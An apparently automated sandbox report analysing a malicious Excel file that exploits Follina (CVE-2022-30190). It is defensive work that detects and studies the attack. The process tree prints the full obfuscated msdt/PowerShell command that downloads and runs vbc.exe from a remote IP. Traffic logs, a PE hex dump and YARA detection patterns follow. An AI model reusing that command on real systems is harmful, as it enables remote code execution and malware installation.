Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
purchase order.xlsx

Overview

General Information

Sample Name:purchase order.xlsx
Analysis ID:653502
MD5:a8930c1fcd80e9965ae26446afb717f6
SHA1:0cbf04bf7fc8522ab983f0246357fa70a85ee56b
SHA256:c02ff7b4d28a259d37a659a6951dba4ee574562ef5fc3b3a0135640c0370dee2
Tags:VelvetSweatshopxlsx
Infos:

Detection

Follina CVE-2022-30190
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Multi AV Scanner detection for submitted file
Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Document exploit detected (process start blacklist hit)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Yara signature match
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Drops PE files to the windows directory (C:\Windows)
Compiles C# or VB.Net code
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)
Downloads executable code via HTTP

Classification

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 1388 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • msdt.exe (PID: 6596 cmdline: C:\Windows\system32\msdt.exe" ms-msdt:/id pcWdiAGNOsTIc -skiP FOrCE /PArAM "It_rEBrowSeforFILe=#AIT IT_LaunchMethod=ContextMenu IT_BrowseForFile=4yt$(IEx($(IEX('[SysTEm.TExt.eNCodIng]'+[CHar]58+[CHAr]58+'UTF8.GeTStRIng([SYstEm.cONveRT]'+[Char]58+[cHAR]58+'FROMBAsE64stRiNg('+[cHaR]34+'U1RvcC1wck9jZVNTIC1Gb3JDZSAtbkFtZSAnbXNkdCc7JFdaID0gYWRkLVR5cEUgLW1FbWJlcmRFZmluSXRJT04gJ1tEbGxJbXBvcnQoInVyTE1vTi5kbEwiLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIEtXTCxzdHJpbmcgcEssc3RyaW5nIGp0Ryx1aW50IEV3LEludFB0ciB6YmcpOycgLU5hbWUgIlFXYiIgLU5hTWVTUGFjZSBtcyAtUGFzc1RocnU7ICRXWjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTE5LjQ4Lzg3MC92YmMuZXhlIiwiJGVOdjpQVUJMSUNcdmJjLmV4ZSIsMCwwKTtzdEFyVC1zTGVFUCgzKTtyVW5kbEwzMi5lWEUgemlwZmxkci5kbGwsUm91dGVUaGVDYWxsICIkRW52OlBVQkxJQ1x2YmMuZXhlIjtTdG9QLVByb2NFU3MgLUZPcmNFIC1uYW1FICdzZGlhZ25ob3N0Jw=='+[cHAr]34+'))'))))ej/../../../../../../../../../../../../.Msi MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
  • csc.exe (PID: 2436 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\byhngmvt\byhngmvt.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
    • cvtres.exe (PID: 2320 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF139.tmp" "c:\Users\user\AppData\Local\Temp\byhngmvt\CSC32F0A3FBBAE2450F8C7268C7C3F4F6C.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • csc.exe (PID: 6112 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1fyof3jw\1fyof3jw.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
    • cvtres.exe (PID: 5636 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES13B6.tmp" "c:\Users\user\AppData\Local\Temp\1fyof3jw\CSCCF40F4DDD1534C9CB221F9FD50B8FC59.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • csc.exe (PID: 6460 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1cq1zudv\1cq1zudv.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000D.00000002.511470035.0000000000820000.00000004.00000020.00020000.00000000.sdmpSUSP_PS1_Msdt_Execution_May22Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitationNasreddine Bencherchali, Christian Burkard
  • 0x46b6:$a: PCWDiagnostic
  • 0x1cf4:$sa1: msdt.exe
  • 0x1d30:$sa1: msdt.exe
  • 0x24b4:$sa1: msdt.exe
  • 0x3c55:$sa1: msdt.exe
  • 0x1d44:$sa3: ms-msdt
  • 0x3c5f:$sa3: ms-msdt
  • 0x1e08:$sb3: IT_BrowseForFile=
  • 0x3cc1:$sb3: IT_BrowseForFile=
0000000D.00000002.511470035.0000000000820000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security
    0000000D.00000002.511764004.0000000000828000.00000004.00000020.00020000.00000000.sdmpSUSP_PS1_Msdt_Execution_May22Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitationNasreddine Bencherchali, Christian Burkard
    • 0xa2ae:$a: PCWDiagnostic
    • 0x5e78:$sa1: msdt.exe
    • 0x1908e:$sa1: msdt.exe
    • 0x22c58:$sa1: msdt.exe
    • 0x22e14:$sa1: msdt.exe
    • 0x272c0:$sb3: IT_BrowseForFile=
    0000000D.00000002.512140531.00000000009A0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security
      0000000D.00000002.512279726.0000000000C80000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security
        Click to see the 1 entries

        Sigma Signatures

        No Sigma rule has matched

        Snort Signatures

        No Snort rule has matched

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Multi AV Scanner detection for submitted file
        Source: purchase order.xlsxReversingLabs: Detection: 17%

        Exploits

        barindex
        Yara detected Microsoft Office Exploit Follina CVE-2022-30190
        Source: Yara matchFile source: 0000000D.00000002.511470035.0000000000820000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.512140531.00000000009A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.512279726.0000000000C80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior

        Software Vulnerabilities

        barindex
        Document exploit detected (process start blacklist hit)
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\msdt.exe
        Source: global trafficTCP traffic: 192.168.2.4:49773 -> 172.245.119.48:80
        Source: global trafficTCP traffic: 192.168.2.4:49773 -> 172.245.119.48:80
        Source: excel.exeMemory has grown: Private usage: 1MB later: 67MB
        Source: global trafficHTTP traffic detected: GET /shipping_invc/document.html HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 172.245.119.48Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /870/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 172.245.119.48Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 28 Jun 2022 08:46:37 GMTServer: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29Last-Modified: Tue, 28 Jun 2022 02:41:13 GMTETag: "6d600-5e278f84f0321"Accept-Ranges: bytesContent-Length: 448000Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 81 4d ba 62 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 ce 06 00 00 06 00 00 00 00 00 00 92 ec 06 00 00 20 00 00 00 00 07 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 07 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 ec 06 00 4f 00 00 00 00 00 07 00 a0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 07 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b0 cc 06 00 00 20 00 00 00 ce 06 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 a0 03 00 00 00 00 07 00 00 04 00 00 00 d0 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 07 00 00 02 00 00 00 d4 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 74 ec 06 00 00 00 00 00 48 00 00 00 02 00 05 00 38 62 00 00 48 3f 00 00 03 00 00 00 53 00 00 06 80 a1 00 00 c0 4a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 05 00 c0 00 00 00 00 00 00 00 02 14 7d 01 00 00 04 02 28 13 00 00 0a 00 00 02 28 09 00 00 06 00 7e 02 00 00 04 74 13 00 00 01 19 8d 12 00 00 01 25 16 72 01 00 00 70 a2 25 17 72 1f 00 00 70 a2 25 18 72 31 00 00 70 a2 28 14 00 00 0a 26 02 72 51 00 00 70 02 28 02 00 00 06 28 15 00 00 0a 6f 16 00 00 0a 00 02 7b 06 00 00 04 02 28 05 00 00 06 6f 16 00 00 0a 00 02 7b 07 00 00 04 72 65 00 00 70 02 28 03 00 00 06 28 15 00 00 0a 6f 16 00 00 0a 00 02 7b 08 00 00 04 02 28 06 00 00 06 6f 16 00 00 0a 00 02 7b 09 00 00 04 02 28 07 00 00 06 6f 16 00 00 0a 00 02 7b 0a 00 00 04 02 28 04 00 00 06 6f 16 00 00 0a 00 2a 13 30 03 00 60 00 00 00 01 00 00 11 00 28 17 00 00 0a d0 05 00 00 01 28 18 00 00 0a 16 6f 19 00 00 0a 0a 06 8e 16 fe 03 0b 07 2c 2a 00 06 16 9a 74 05 00 00 01 0c 08 6f 1a 00 00 0a 72 7d 00 00 70 28 1b 00 00 0a 0d 09 2c 0b 00 08 6f 1a 00 00 0a 13 04 2b 14 00 28 17 00 00 0a 6
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: http://b.c2r.ts.cdn.office.net/pr
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://addinslicensing.store.office.com/apps/remove
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://api.aadrm.com
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://api.aadrm.com/
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://api.addins.store.office.com/addinstemplate
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://api.cortana.ai
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://api.diagnostics.office.com
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://api.microsoftstream.com/api/
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://api.office.net
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://api.onedrive.com
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://apis.live.net/v5.0/
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://augloop.office.com
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://augloop.office.com/v2
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://cdn.entity.
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://clients.config.office.net/
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://config.edge.skype.com
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://cortana.ai
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://cortana.ai/api
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://cr.office.com
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://dataservice.o365filtering.com
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://dataservice.o365filtering.com/
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://dev.cortana.ai
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://devnull.onenote.com
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://directory.services.
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://edu-mathreco-prod.trafficmanager.net
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://edu-mathsolver-prod.trafficmanager.net
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://enrichment.osi.office.net/
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://graph.ppe.windows.net
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://graph.ppe.windows.net/
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://graph.windows.net
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://graph.windows.net/
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
